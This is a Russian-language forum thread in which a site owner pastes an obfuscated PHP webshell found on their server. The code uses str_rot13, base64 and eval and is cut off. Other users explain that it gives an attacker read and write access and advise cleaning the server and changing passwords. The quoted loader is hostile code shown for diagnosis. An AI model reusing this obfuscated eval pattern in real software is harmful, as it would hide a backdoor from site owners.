Форум Сайтостроение Веб-строительство

Ломанули меня?

12
D
На сайте с 28.06.2008
Offline
1114
Dram
1143

Господа, сейчас лазил по серверу - наткнулся на файл, называется x2.php.xl, там код : 

<?php 



//Required MySQL core library 



$a4c1b1933baf3d=str_rot13('tmhapbzcerff');$a4c1b1933bb31a=str_rot13(strrev('rqbprq_46rfno')); eval($a4c1b1933baf3d($a4c1b1933bb31a('eF5Tcffxd3L0CY5Wjzc0NDIyMzMwNjKLV4+1dSwqSqzU0LQGAI9xCLI='))); eval($a4c1b1933baf3d($a4c1b1933bb31a('eF5LK81LLsnMz1OINzQ0NTY0Njc3NdJQydSsVkm0dSwqSqzU0L.......  ?>

Не подскажите, что делает этот файлик?

vinnipuh
На сайте с 25.11.2010
Offline
4
vinnipuh
#1

Скорее всего, ломанули. Достаточно странный код :)

Всегда постараюсь помочь советом :-) А ещё Вы можете заказать у меня разработку PHP-скриптов (/ru/forum/572825) :-)
iamsens
На сайте с 26.08.2009
Offline
115
iamsens
#2

да, это вебшелл

залил, раскоденый вариант и без авторизации, если интересно

ищи как залили...

vinnipuh
На сайте с 25.11.2010
Offline
4
vinnipuh
#3

Dram, на каком движке сайт?

LEOnidUKG
На сайте с 25.11.2006
Offline
1774
LEOnidUKG
#4

Джумла.

10 раз

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
vinnipuh
На сайте с 25.11.2010
Offline
4
vinnipuh
#5

Почему-то так же подумал.

WS
На сайте с 17.11.2010
Offline
25
WhiteSmartFox
#6

скорее всего дело не в движке,а в кражи паролей к фтп. Была бы дырка в движке залили бы код в саму базу (дырок на sql инъекции куда больше чем на запись файлов).

В первую очередь проверяйте свой компьютер на вирусы.

Яндекс перезапустил «Охоту за Яндекс усилил защиту аккаунтов Яндекс.Браузер стал корпоративным браузером
D
На сайте с 28.06.2008
Offline
1114
Dram
#7
iamsens:
да, это вебшелл
залил, раскоденый вариант и без авторизации, если интересно

ищи как залили...

Спасибо, а что он делал, этот файлик? Какую функцию выполнял? Блин.... целый год там лежал :(

vinnipuh
На сайте с 25.11.2010
Offline
4
vinnipuh
#8

Dram, ну, целый год был доступ к вашему серверу у того, кто закинул вам этот скрипт.

WS
На сайте с 17.11.2010
Offline
25
WhiteSmartFox
#9
Dram:
Какую функцию выполнял

Позволял писать и читать любую информацию на ваш сервер.

Dram:
целый год там лежал

Уверены? Дата создания файла в данном случае может быть ложной.

D
На сайте с 28.06.2008
Offline
1114
Dram
#10

Спасибо, пошел чиститься и менять пороли, гляну так же в бекапах - был ли он раньше

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий